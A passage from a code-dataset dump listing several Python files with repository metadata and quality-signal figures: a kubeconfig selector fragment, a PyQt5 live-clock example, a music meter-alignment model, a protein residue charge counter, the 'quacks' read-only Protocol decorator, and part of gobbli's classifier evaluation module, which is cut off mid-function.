            config_file = self.load_file(filepath)
            if config_file:
                collection.add_file(config_file)
        return collection


def get_selector() -> KubeConfigSelector:
    loader = KubeConfigLoader()
    collection = loader.create_collection()
    selector = KubeConfigSelector(collection=collection)
    return selector
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 30.901499 | 86 | 0.56538 | 1,671 | 14,431 | 4.661879 | 0.139437 | 0.025417 | 0.018357 | 0.013864 | 0.240308 | 0.161361 | 0.107317 | 0.071117 | 0.071117 | 0.05982 | 0 | 0.002412 | 0.339339 | 14,431 | 466 | 87 | 30.967811 | 0.814663 | 0.062019 | 0 | 0.189944 | 0 | 0.002793 | 0.066952 | 0.005161 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078212 | false | 0.01676 | 0.02514 | 0.01676 | 0.195531 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 6 — `other/application/windowApp/test6.py` from `Ethan7102/FYP`** (hexsha `ddb11949c25d2f8ec4e231606475f6d7c71dff61`, size 1,256, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `other/application/windowApp/test6.py` | `Ethan7102/FYP` | `c6560a0b95ad78d5e1a341ab2d93c063e10c6631` | ["MIT"] | null | null | null |
| max_issues | `other/application/windowApp/test6.py` | `Ethan7102/FYP` | `c6560a0b95ad78d5e1a341ab2d93c063e10c6631` | ["MIT"] | null | null | null |
| max_forks | `other/application/windowApp/test6.py` | `Ethan7102/FYP` | `c6560a0b95ad78d5e1a341ab2d93c063e10c6631` | ["MIT"] | 1 | 2021-01-23T07:59:57.000Z | 2021-01-23T07:59:57.000Z |

`content` (comments translated from Chinese):
```python
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject
from PyQt5.QtWidgets import QApplication, QDialog, QLineEdit
import time
import sys

class BackendThread(QObject):
    # Define the signal as a class attribute
    update_date = pyqtSignal(str)

    # Business logic: emit the current time once per second
    def run(self):
        while True:
            data = QDateTime.currentDateTime()
            currTime = data.toString("yyyy-MM-dd hh:mm:ss")
            self.update_date.emit(str(currTime))
            time.sleep(1)

class Window(QDialog):
    def __init__(self):
        QDialog.__init__(self)
        self.setWindowTitle('PyQt 5界面实时更新例子')  # "PyQt5 live UI update example"
        self.resize(400, 100)
        self.input = QLineEdit(self)
        self.input.resize(400, 100)
        self.initUI()

    def initUI(self):
        # Create the worker
        self.backend = BackendThread()
        # Connect the signal
        self.backend.update_date.connect(self.handleDisplay)
        self.thread = QThread()
        self.backend.moveToThread(self.thread)
        # Start the thread
        self.thread.started.connect(self.backend.run)
        self.thread.start()

    # Write the current time into the text box
    def handleDisplay(self, data):
        self.input.setText(data)

if __name__ == '__main__':
    app = QApplication(sys.argv)
    win = Window()
    win.show()
    sys.exit(app.exec_())
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 25.632653 | 64 | 0.627389 | 140 | 1,256 | 5.485714 | 0.492857 | 0.057292 | 0.03125 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017279 | 0.262739 | 1,256 | 49 | 65 | 25.632653 | 0.812095 | 0.035828 | 0 | 0 | 0 | 0 | 0.034025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.323529 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 7 — `model/meter.py` from `meiwei92/meter-alignment`** (hexsha `ddb1e5dab629942b29ba8fb6aab9cb866f52c858`, size 13,098, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `model/meter.py` | `meiwei92/meter-alignment` | `dc92e4aca0ca80ed1c9418027b050e9631b5fb7a` | ["MIT"] | null | null | null |
| max_issues | `model/meter.py` | `meiwei92/meter-alignment` | `dc92e4aca0ca80ed1c9418027b050e9631b5fb7a` | ["MIT"] | null | null | null |
| max_forks | `model/meter.py` | `meiwei92/meter-alignment` | `dc92e4aca0ca80ed1c9418027b050e9631b5fb7a` | ["MIT"] | null | null | null |

`content`:
```python
from __future__ import annotations

from typing import List, Tuple, OrderedDict as OrderedDictType, DefaultDict, Optional
from collections import OrderedDict, defaultdict

from metric import MusicNote, TimePointSequence
from model.base import MidiModel, MidiModelState
from model.beat import TatumTrackingModelState, TatumTrackingGrammarModelState
from model.voice import VoiceSplittingModelState, VoiceSplittingGrammarModelState
from model.hierarchy import HierarchyModelState, HierarchyGrammarModelState


class MeterModel(MidiModel):
    new_voice_states: DefaultDict[VoiceSplittingModelState, List[VoiceSplittingModelState]]
    new_tatum_states: DefaultDict[TatumTrackingModelState, DefaultDict[Tuple[MusicNote], List[TatumTrackingModelState]]]

    def __init__(self, hierarchy_state: HierarchyModelState = None,
                 voice_state: VoiceSplittingModelState = None,
                 tatum_state: TatumTrackingModelState = None,
                 beam_size: int = 200):
        super(MeterModel).__init__()
        self.beam_size = -1 if beam_size is None else beam_size
        self.started = False
        self.new_voice_states = defaultdict(lambda: [])
        self.new_tatum_states = defaultdict(lambda: defaultdict(lambda: []))
        self.started_states: OrderedDictType[MeterModelState, None] = OrderedDict()
        self.hypothesis_states: OrderedDictType[MeterModelState, None] = OrderedDict()
        mms = MeterModelState(meter_model=self,
                              hierarchy_state=hierarchy_state,
                              voice_state=voice_state,
                              tatum_state=tatum_state)
        self.hypothesis_states.update({mms: None})

    def get_beam_size(self) -> int:
        return self.beam_size

    def is_beam_full(self) -> bool:
        return (not self.beam_size <= -1) and (len(self.started_states) >= self.beam_size)

    def transition(self, notes: List[MusicNote] = None) -> OrderedDictType[MeterModelState]:
        return self.__transition_close_worker(notes=notes, none_as_close=False)

    def close(self) -> OrderedDictType[MeterModelState]:
        return self.__transition_close_worker(notes=None, none_as_close=True)

    def __transition_close_worker(self, notes: List[MusicNote] = None, none_as_close=False) -> OrderedDictType[MeterModelState]:
        new_states: OrderedDict[MeterModelState, None] = OrderedDict()
        do_close = (notes is None and none_as_close)
        self.started_states = OrderedDict()
        self.new_tatum_states = defaultdict(lambda: defaultdict(lambda: []))
        self.new_voice_states = defaultdict(lambda: [])
        if not self.started:
            self.started = True
        for mms in self.hypothesis_states:
            if do_close:
                ts = mms.close()
            else:
                ts = mms.transition(notes)
            for ns in ts.keys():
                new_states.update({ns: None})
                if ns.is_started():
                    self.started_states.update({ns: None})
        ## fixForBeam ????
        if not do_close:
            # todo logging
            pass
        self.hypothesis_states = new_states
        return self.hypothesis_states

    def get_hypotheses(self) -> OrderedDictType[MidiModelState, None]:
        pass

    def get_tatum_hypotheses(self) -> List[TatumTrackingModelState]:
        tatum_hypotheses = []
        for mms in self.hypothesis_states:
            tatum_hypotheses.append(mms.tatum_tracking_state)
        return tatum_hypotheses


class MeterGrammarModel(MeterModel):
    def __init__(self, sequence: TimePointSequence, beam_size: int = 200):
        hs: HierarchyModelState = HierarchyGrammarModelState(sequence=sequence)
        vs: VoiceSplittingModelState = VoiceSplittingGrammarModelState(sequence=sequence)
        ts: TatumTrackingModelState = TatumTrackingGrammarModelState(sequence=sequence)
        super(MeterGrammarModel, self).__init__(hierarchy_state=hs, voice_state=vs, tatum_state=ts, beam_size=beam_size)


class MeterPredictionModel(MeterModel):
    def __init__(self, sequence: TimePointSequence, beam_size: int = 200):
        super(MeterPredictionModel, self).__init__(beam_size=beam_size)
        pass


class MeterModelState(MidiModelState):
    def __init__(self, meter_model: MeterModel,
                 hierarchy_state: HierarchyModelState,
                 voice_state: VoiceSplittingModelState = None,
                 tatum_state: TatumTrackingModelState = None) -> None:
        super(MeterModelState).__init__()
        tts_none = tatum_state is None
        vss_none = voice_state is None
        # voice_state and tatum_state must be both set or both None. One set and one None is not allowed.
        if tts_none == vss_none:
            self.meter_model: MeterModel = meter_model
            self.voice_splitting_state: VoiceSplittingModelState = voice_state
            self.hierarchy_state: HierarchyModelState = hierarchy_state
            self.tatum_tracking_state: TatumTrackingModelState = tatum_state
            # this branch can only be reached if both values have the same truth value,
            # therefore just checking one is enough
            if tts_none:
                self.voice_splitting_state = hierarchy_state.get_voice_splitting_state()
                self.tatum_tracking_state = self.hierarchy_state.get_tatum_tracking_state().deep_copy()
                self.hierarchy_state = self.hierarchy_state.deep_copy()
                self.tatum_tracking_state.set_hierarchy_state(self.hierarchy_state)
        else:
            raise ValueError("Given value-combination is not supported")

    def set_tatum_tracking_state(self, state: TatumTrackingModelState):
        self.tatum_tracking_state = state

    def set_voice_splitting_state(self, state: VoiceSplittingModelState):
        self.voice_splitting_state = state

    def set_hierarchy_state(self, state: HierarchyModelState):
        self.hierarchy_state = state

    def transition(self, notes: List[MusicNote] = None) -> OrderedDictType[MeterModelState]:
        return self.__transition_close_worker(notes=notes, none_as_close=False)

    def close(self) -> OrderedDictType[MeterModelState]:
        return self.__transition_close_worker(notes=None, none_as_close=True)

    def __transition_close_worker(self, notes: List[MusicNote] = None, none_as_close=False) -> OrderedDictType[MeterModelState, None]:
        new_state: OrderedDictType[MeterModelState, None] = OrderedDict()
        do_close = (notes is None and none_as_close)
        beam_full = self.meter_model.is_beam_full()
        if beam_full:
            voice_outside_beam = self.get_score() < next(reversed(self.meter_model.started_states)).get_score()
            if voice_outside_beam:
                return new_state

        new_voice_states: List[VoiceSplittingModelState] = self.meter_model.new_voice_states[self.voice_splitting_state]
        if len(new_voice_states) == 0:
            if do_close:
                state_dict = self.voice_splitting_state.close()
            else:
                state_dict = self.voice_splitting_state.transition(notes)
            new_voice_states = [*state_dict.keys()]
            self.meter_model.new_voice_states.update({self.voice_splitting_state: new_voice_states})

        new_tatum_states = []
        new_notes_list = []
        for v_state in new_voice_states:
            if beam_full:
                beat_score = v_state.get_score() + \
                             self.tatum_tracking_state.get_score() + \
                             self.tatum_tracking_state.get_hierarchy_state().get_score()
                tatum_outside_beam = beat_score <= next(reversed(self.meter_model.started_states)).get_score()
                if tatum_outside_beam:
                    if not do_close:
                        new_notes_list.append([])
                    new_tatum_states.append([])
                    continue
            tatum_state_copy = self.tatum_tracking_state.deep_copy()
            tatum_state_copy.set_hierarchy_state(self.tatum_tracking_state.hierarchy_state)
            if do_close:
                nts = tatum_state_copy.close()
                nts = [*nts.keys()]
                new_tatum_states.append(nts)
            else:
                new_notes: List[MusicNote] = []
                for n in notes:
                    if self.voice_splitting_state.keep_note(n):
                        new_notes.append(n)
                new_notes_list.append(new_notes)
                if tatum_state_copy.is_started():
                    nts = tatum_state_copy.transition(notes)
                    nts = [*nts.keys()]
                    new_tatum_states.append(nts)
                else:
                    tatums_map = self.meter_model.new_tatum_states[tatum_state_copy]
                    if len(tatums_map) == 0:
                        pass
                    branched_states = tatums_map[tuple(new_notes)]
                    if len(branched_states) == 0:
                        bs = tatum_state_copy.transition(new_notes)
                        branched_states = [*bs.keys()]
                        tatums_map.update({tuple(new_notes): branched_states})
                    new_tatum_states.append(branched_states)

        for i in range(len(new_tatum_states)):
            new_voice_state = new_voice_states[i]
            tatum_states = new_tatum_states[i]
            nnotes = new_notes_list[i] if not do_close else []
            new_states_tmp = []
            for tstate in tatum_states:
                beat_score = new_voice_state.get_score() + \
                             tstate.get_score() + \
                             tstate.get_hierarchy_state().get_score()
                if beam_full:
                    state_outside_beam = next(reversed(self.meter_model.started_states)).get_score() >= beat_score
                    if state_outside_beam:
                        # todo: Logging
                        continue
                hierarchy_state_copy: HierarchyModelState = self.hierarchy_state.deep_copy()
                hierarchy_state_copy.set_voice_splitting_state(new_voice_state)
                hierarchy_state_copy.set_tatum_tracking_state(tstate)
                tstate.set_hierarchy_state(hierarchy_state_copy)
                if not do_close:
                    # todo: Special case
                    pass
                if do_close:
                    new_hierarchy_states = hierarchy_state_copy.close()
                else:
                    new_hierarchy_states = hierarchy_state_copy.transition(nnotes)
                new_hierarchy_states = [*new_hierarchy_states.keys()]
                for hms in new_hierarchy_states:
                    self.add_new_state(hms, new_states_tmp, check_duplicate=True)
            for mms in new_states_tmp:
                new_state.update({mms: None})
        return new_state

    def get_score(self) -> float:
        vs_score = 0 if self.voice_splitting_state is None else self.voice_splitting_state.get_score()
        tt_score = 0 if self.tatum_tracking_state is None else self.tatum_tracking_state.get_score()
        h_score = 0 if self.hierarchy_state is None else self.hierarchy_state.get_score()
        return vs_score + tt_score + h_score

    def add_new_state(self, hms: HierarchyModelState,
                      temp_states_list: List[MeterModelState] = [], check_duplicate: bool = True):
        mms = MeterModelState(meter_model=self.meter_model, hierarchy_state=hms)
        if not check_duplicate:
            temp_states_list.append(mms)
        else:
            duplicated_state: Optional[MeterModelState] = None
            for s in temp_states_list:
                if s.is_duplicate_of(mms):
                    duplicated_state = s
                    break
            if duplicated_state is not None:
                if duplicated_state.get_score() < mms.get_score():
                    temp_states_list.append(mms)
                    temp_states_list.remove(duplicated_state)
                    # todo add logging for removal of duplicated_state
                else:
                    # todo add logging for removal of mms
                    pass
            else:
                temp_states_list.append(mms)

    def is_duplicate_of(self, state: MeterModelState) -> bool:
        hierachy_duplicate = self.hierarchy_state.is_duplicate_of(state.hierarchy_state)
        tatum_duplicate = self.tatum_tracking_state.is_duplicate_of(state.tatum_tracking_state)
        voice_duplicate = True
        # if something change voice_duplicate (todo at MeterDetection phase)
        # voice_duplicate = self.voice_splitting_state.is_duplicate_of(state.voice_splitting_state)
        return hierachy_duplicate and tatum_duplicate and voice_duplicate

    def get_measure_count(self):
        return self.tatum_tracking_state.get_measure_count()

    def is_started(self) -> bool:
        measure_count = self.get_measure_count()
        return measure_count > 0
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 42.803922 | 134 | 0.64506 | 1,431 | 13,098 | 5.561845 | 0.113906 | 0.056288 | 0.038447 | 0.03317 | 0.351049 | 0.239854 | 0.181053 | 0.181053 | 0.153663 | 0.124387 | 0 | 0.001916 | 0.282791 | 13,098 | 305 | 135 | 42.944262 | 0.845327 | 0.038861 | 0 | 0.253394 | 0 | 0 | 0.003181 | 0 | 0 | 0 | 0 | 0.003279 | 0 | 1 | 0.099548 | false | 0.027149 | 0.036199 | 0.031674 | 0.226244 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 8 — `hw2skeleton/find_features.py` from `hasuni-max/hw2-skeleton`** (hexsha `ddb3b3248298a56481c0e14a355de5998e1c7be4`, size 1,029, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `hw2skeleton/find_features.py` | `hasuni-max/hw2-skeleton` | `498f5d250ec18042c1e21fac177a92f3c7d3da7c` | ["Apache-2.0"] | null | null | null |
| max_issues | `hw2skeleton/find_features.py` | `hasuni-max/hw2-skeleton` | `498f5d250ec18042c1e21fac177a92f3c7d3da7c` | ["Apache-2.0"] | null | null | null |
| max_forks | `hw2skeleton/find_features.py` | `hasuni-max/hw2-skeleton` | `498f5d250ec18042c1e21fac177a92f3c7d3da7c` | ["Apache-2.0"] | null | null | null |

`content`:
```python
global plus
global minus
minus = ["ASP","GLU"]
plus = ["ARG","HIS","LYS"]

def find_charge(residues):
    """
    Takes a list of residues and returns the number of plus and
    minus charged residues.

    This function uses the global plus and minus variables
    """
    global plus
    global minus
    plus_charge = sum([res in plus for res in residues])
    minus_charge = sum([res in minus for res in residues])
    return plus_charge, minus_charge

def calc_features(active_sites):
    features = {}
    for act in active_sites:
        features[act.name] = []
        number_of_residues = len(act.residues)
        three_letter = [str(x)[0:3] for x in act.residues]
        plus_charge, minus_charge = find_charge(three_letter)
        number_of_chains = len(act.chains)
        features[act.name].append(number_of_residues)  #number of residues
        features[act.name].append(plus_charge)  #number of plus charges - done
        features[act.name].append(minus_charge)  #number of minus charges - done
        features[act.name].append(number_of_chains)  #number of chains - done
    return features
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 25.097561 | 73 | 0.737609 | 158 | 1,029 | 4.658228 | 0.297468 | 0.097826 | 0.101902 | 0.11413 | 0.137228 | 0.137228 | 0 | 0 | 0 | 0 | 0 | 0.002315 | 0.16035 | 1,029 | 40 | 74 | 25.725 | 0.849537 | 0.234208 | 0 | 0.173913 | 0 | 0 | 0.019557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0 | 0 | 0.173913 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 9 — `src/quacks/__init__.py` from `ariebovenberg/quacks`** (hexsha `ddbaaba267f11c03c921ef7b0388970b8db8a6b9`, size 2,396, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `src/quacks/__init__.py` | `ariebovenberg/quacks` | `839d307b24f3f37d9a5318c16acb631b9a1153f0` | ["MIT"] | 11 | 2021-12-12T20:51:15.000Z | 2022-02-02T12:08:32.000Z |
| max_issues | `src/quacks/__init__.py` | `ariebovenberg/quacks` | `839d307b24f3f37d9a5318c16acb631b9a1153f0` | ["MIT"] | 8 | 2021-12-14T12:53:51.000Z | 2022-03-15T04:29:44.000Z |
| max_forks | `src/quacks/__init__.py` | `ariebovenberg/quacks` | `839d307b24f3f37d9a5318c16acb631b9a1153f0` | ["MIT"] | 1 | 2021-12-15T16:50:34.000Z | 2021-12-15T16:50:34.000Z |

`content`:
```python
from typing import _GenericAlias  # type: ignore
from typing import ClassVar

from typing_extensions import Protocol

# Single-sourcing the version number with poetry:
# https://github.com/python-poetry/poetry/pull/2366#issuecomment-652418094
try:
    __version__ = __import__("importlib.metadata").metadata.version(__name__)
except ModuleNotFoundError:  # pragma: no cover
    __version__ = __import__("importlib_metadata").version(__name__)

__all__ = ["readonly"]


def readonly(cls: type) -> type:
    """Decorate a :class:`~typing.Protocol` to make it read-only.

    Unlike default protocol attributes, read-only protocols will match
    frozen dataclasses and other immutable types.

    Read-only attributes are already supported in protocols with
    ``@property``, but this is cumbersome to do for many attributes.
    The ``@readonly`` decorator effectively transforms all mutable attributes
    into read-only properties.

    Example
    -------

    .. code-block:: python

        from quacks import readonly

        @readonly
        class User(Protocol):
            id: int
            name: str
            is_premium: bool

        # equivalent to:

        class User(Protocol):
            @property
            def id(self) -> int: ...
            @property
            def name(self) -> str: ...
            @property
            def is_premium(self) -> bool: ...

    Warning
    -------
    Subprotocols and inherited attributes are not supported yet.
    """
    if not _is_a_protocol(cls):
        raise TypeError("Readonly decorator can only be applied to Protocols.")
    elif any(b is not Protocol and _is_a_protocol(b) for b in cls.__bases__):
        raise NotImplementedError("Subprotocols not yet supported.")

    for name, typ in getattr(cls, "__annotations__", {}).items():
        if not _is_classvar(typ):

            @property  # type: ignore
            def prop(self):  # type: ignore
                ...  # pragma: no cover

            prop.fget.__name__ = name  # type: ignore
            prop.fget.__annotations__ = {"return": typ}  # type: ignore
            setattr(cls, name, prop)
    return cls


def _is_a_protocol(t: type) -> bool:
    # Only classes *directly* inheriting from Protocol are protocols.
    return Protocol in t.__bases__


def _is_classvar(t: type) -> bool:
    return type(t) is _GenericAlias and t.__origin__ is ClassVar
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 29.95 | 79 | 0.647329 | 280 | 2,396 | 5.285714 | 0.414286 | 0.033784 | 0.022297 | 0.040541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007307 | 0.257513 | 2,396 | 79 | 80 | 30.329114 | 0.824621 | 0.479549 | 0 | 0 | 0 | 0 | 0.131907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.192308 | 0.076923 | 0.461538 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 10 — `gobbli/inspect/evaluate.py` from `RTIInternational/gobbli`** (hexsha `ddbb30413bba7d94f4e08a1b8b5b0f62d116a712`, size 13,818, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `gobbli/inspect/evaluate.py` | `RTIInternational/gobbli` | `d9ec8132f74ce49dc4bead2fad25b661bcef6e76` | ["Apache-2.0"] | 276 | 2019-09-13T08:25:51.000Z | 2022-03-05T13:07:55.000Z |
| max_issues | `gobbli/inspect/evaluate.py` | `RTIInternational/gobbli` | `d9ec8132f74ce49dc4bead2fad25b661bcef6e76` | ["Apache-2.0"] | 15 | 2019-09-06T14:05:30.000Z | 2022-01-01T20:15:06.000Z |
| max_forks | `gobbli/inspect/evaluate.py` | `RTIInternational/gobbli` | `d9ec8132f74ce49dc4bead2fad25b661bcef6e76` | ["Apache-2.0"] | 24 | 2019-09-18T15:11:42.000Z | 2021-12-23T18:59:55.000Z |

`content`:
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Sequence, Tuple, Union
import altair as alt
import pandas as pd
from sklearn.metrics import (
accuracy_score,
classification_report,
f1_score,
precision_score,
recall_score,
)
from gobbli.util import (
as_multiclass,
as_multilabel,
escape_line_delimited_text,
is_multilabel,
multilabel_to_indicator_df,
pred_prob_to_pred_label,
pred_prob_to_pred_multilabel,
truncate_text,
)
@dataclass
class ClassificationError:
"""
Describes an error in classification. Reports the original text,
the true label, and the predicted probability.
Args:
X: The original text.
y_true: The true label(s).
y_pred_proba: The model predicted probability for each class.
"""
X: str
y_true: Union[str, List[str]]
y_pred_proba: Dict[str, float]
@property
def y_pred(self) -> str:
"""
Returns:
The class with the highest predicted probability for this observation.
"""
return max(self.y_pred_proba, key=lambda k: self.y_pred_proba[k])
def y_pred_multilabel(self, threshold: float = 0.5) -> List[str]:
"""
Args:
threshold: The predicted probability threshold for predictions
Returns:
The predicted labels for this observation (predicted probability greater than
the given threshold)
"""
return pred_prob_to_pred_multilabel(self.y_pred_proba, threshold)
MetricFunc = Callable[[Sequence[str], pd.DataFrame], float]
"""
A function used to calculate some metric. It should accept a sequence of true labels (y_true)
and a dataframe of shape (n_samples, n_classes) containing predicted probabilities; it should
output a real number.
"""
DEFAULT_METRICS: Dict[str, MetricFunc] = {
"Weighted F1 Score": lambda y_true, y_pred: f1_score(
y_true, y_pred, average="weighted"
),
"Weighted Precision Score": lambda y_true, y_pred: precision_score(
y_true, y_pred, average="weighted"
),
"Weighted Recall Score": lambda y_true, y_pred: recall_score(
y_true, y_pred, average="weighted"
),
"Accuracy": lambda y_true, y_pred: accuracy_score(y_true, y_pred),
}
"""
The default set of metrics to evaluate classification models with. Users may want to extend
this.
"""
@dataclass
class ClassificationEvaluation:
"""
Provides several methods for evaluating the results from a classification problem.
Args:
labels: The set of unique labels in the dataset.
X: The list of texts that were classified.
y_true: The true labels for the dataset.
y_pred_proba: A dataframe containing a row for each observation in X and a
column for each label in the training data. Cells are predicted probabilities.
"""
labels: List[str]
X: List[str]
y_true: Union[List[str], List[List[str]]]
y_pred_proba: pd.DataFrame
metric_funcs: Optional[Dict[str, Callable[[Sequence, Sequence], float]]] = None
def __post_init__(self):
if not len(self.y_true) == self.y_pred_proba.shape[0]:
raise ValueError(
"y_true and y_pred_proba must have the same number of observations"
)
self.multilabel = is_multilabel(self.y_true)
@property
def y_true_multiclass(self) -> List[str]:
return as_multiclass(self.y_true, self.multilabel)
@property
def y_true_multilabel(self) -> pd.DataFrame:
return multilabel_to_indicator_df(
as_multilabel(self.y_true, self.multilabel), self.labels
)
@property
def y_pred_multiclass(self) -> List[str]:
"""
Returns:
Predicted class for each observation (assuming multiclass context).
"""
return pred_prob_to_pred_label(self.y_pred_proba)
@property
def y_pred_multilabel(self) -> pd.DataFrame:
"""
Returns:
Indicator dataframe containing a 0 if each label wasn't predicted and 1 if
it was for each observation.
"""
return pred_prob_to_pred_multilabel(self.y_pred_proba).astype("int")
def metrics(self) -> Dict[str, float]:
"""
Returns:
A dictionary containing various metrics of model performance on the test dataset.
"""
metric_funcs = self.metric_funcs
if metric_funcs is None:
metric_funcs = DEFAULT_METRICS
if self.multilabel:
y_true: Union[List[str], pd.DataFrame] = self.y_true_multilabel
y_pred: Union[List[str], pd.DataFrame] = self.y_pred_multilabel
else:
y_true = self.y_true_multiclass
y_pred = self.y_pred_multiclass
return {
name: metric_func(y_true, y_pred)
for name, metric_func in metric_funcs.items()
}
def metrics_report(self) -> str:
"""
Returns:
A nicely formatted human-readable report describing metrics of model performance
on the test dataset.
"""
metric_string = "\n".join(
f"{name}: {metric}" for name, metric in self.metrics().items()
)
if self.multilabel:
y_true: Union[pd.DataFrame, List[str]] = self.y_true_multilabel
y_pred: Union[pd.DataFrame, List[str]] = self.y_pred_multilabel
# Since these are indicator dataframes, the "labels" are indices
labels: Union[List[str], List[int]] = list(range(len(self.labels)))
else:
y_true = self.y_true_multiclass
y_pred = self.y_pred_multiclass
# Since these are lists of labels, the "labels" are the strings themselves
labels = self.labels
return (
"Metrics:\n"
"--------\n"
f"{metric_string}\n\n"
"Classification Report:\n"
"----------------------\n"
f"{classification_report(y_true, y_pred, labels=labels, target_names=self.labels)}\n"
)
def plot(self, sample_size: Optional[int] = None) -> alt.Chart:
"""
Args:
sample_size: Optional number of points to sample for the plot. Unsampled
plots may be difficult to save due to their size.
Returns:
An Altair chart visualizing predicted probabilities and true classes to visually identify
where errors are being made.
"""
# Since multilabel is a generalization of the multiclass paradigm, implement
# this visualization the same for multiclass and multilabel using the multilabel
# format
pred_prob_df = self.y_pred_proba
true_df = self.y_true_multilabel
if sample_size is not None:
# Avoid errors due to sample being larger than the population if the number
# of observations is smaller than the sample size
pred_prob_df = pred_prob_df.sample(
n=min(sample_size, pred_prob_df.shape[0])
)
true_df = true_df.iloc[pred_prob_df.index]
charts = []
if self.multilabel:
legend_label = "Has Label"
else:
legend_label = "Belongs to Class"
for label in self.labels:
# Plot the predicted probabilities for given label for all observations
plot_df = (
pred_prob_df[[label]]
.rename({label: "Predicted Probability"}, axis="columns")
.join(
true_df[[label]]
.astype("bool")
.rename({label: legend_label}, axis="columns")
)
)
charts.append(
alt.layer(
alt.Chart(plot_df, title=label, height=40)
.mark_circle(size=8)
.encode(
x=alt.X(
"Predicted Probability",
type="quantitative",
title=None,
scale=alt.Scale(domain=(0.0, 1.0)),
),
y=alt.Y(
"jitter",
type="quantitative",
title=None,
axis=alt.Axis(
values=[0], ticks=True, grid=False, labels=False
),
scale=alt.Scale(),
),
color=alt.Color(legend_label, type="nominal"),
)
.transform_calculate(
# Generate Gaussian jitter with a Box-Muller transform
jitter="sqrt(-2*log(random()))*cos(2*PI*random())/32"
)
.properties(height=40)
)
)
return alt.vconcat(*charts)
def errors_for_label(self, label: str, k: int = 10):
"""
Output the biggest mistakes for the given class by the classifier
Args:
label: The label to return errors for.
k: The number of results to return for each of false positives and false negatives.
Returns:
A 2-tuple. The first element is a list of the top ``k`` false positives, and the
second element is a list of the top ``k`` false negatives.
"""
pred_label = self.y_pred_multilabel[label].astype("bool")
true_label = self.y_true_multilabel[label].astype("bool")
# Order false positives/false negatives by the degree of the error;
# i.e. we want the false positives with highest predicted probability first
# and false negatives with lowest predicted probability first
# Take the top `k` of each
false_positives = (
self.y_pred_proba.loc[pred_label & ~true_label]
.sort_values(by=label, ascending=False)
.iloc[:k]
)
false_negatives = (
self.y_pred_proba.loc[~pred_label & true_label]
.sort_values(by=label, ascending=True)
.iloc[:k]
)
def create_classification_errors(
y_pred_proba: pd.DataFrame,
) -> List[ClassificationError]:
classification_errors = []
for ndx, row in y_pred_proba.iterrows():
classification_errors.append(
ClassificationError(
X=self.X[ndx],
y_true=self.y_true[ndx],
y_pred_proba=row.to_dict(),
)
)
return classification_errors
return (
create_classification_errors(false_positives),
create_classification_errors(false_negatives),
)
def errors(
self, k: int = 10
) -> Dict[str, Tuple[List[ClassificationError], List[ClassificationError]]]:
"""
Output the biggest mistakes for each class by the classifier.
Args:
k: The number of results to return for each of false positives and false negatives.
Returns:
A dictionary whose keys are label names and values are 2-tuples. The first
element is a list of the top ``k`` false positives, and the second element is a list
of the top ``k`` false negatives.
"""
errors = {}
for label in self.labels:
errors[label] = self.errors_for_label(label, k=k)
return errors
def errors_report(self, k: int = 10) -> str:
"""
Args:
k: The number of results to return for each of false positives and false negatives.
Returns:
A nicely-formatted human-readable report describing the biggest mistakes made by
the classifier for each class.
"""
errors = self.errors(k=k)
output = "Errors Report\n" "------------\n\n"
for label, (false_positives, false_negatives) in errors.items():
def make_errors_str(errors: List[ClassificationError]) -> str:
if self.multilabel:
return "\n".join(
(
f"Correct Value: {label in e.y_true}\n"
f"Predicted Probability: {e.y_pred_proba[label]}"
f"Text: {truncate_text(escape_line_delimited_text(e.X), 500)}\n"
)
for e in errors
)
else:
return "\n".join(
(
f"True Class: {e.y_true}\n"
f"Predicted Class: {e.y_pred} (Probability: {e.y_pred_proba[e.y_pred]})\n"
f"Text: {truncate_text(escape_line_delimited_text(e.X), 500)}\n"
)
for e in errors
)
false_positives_str = make_errors_str(false_positives)
if len(false_positives_str) == 0:
false_positives_str = "None"
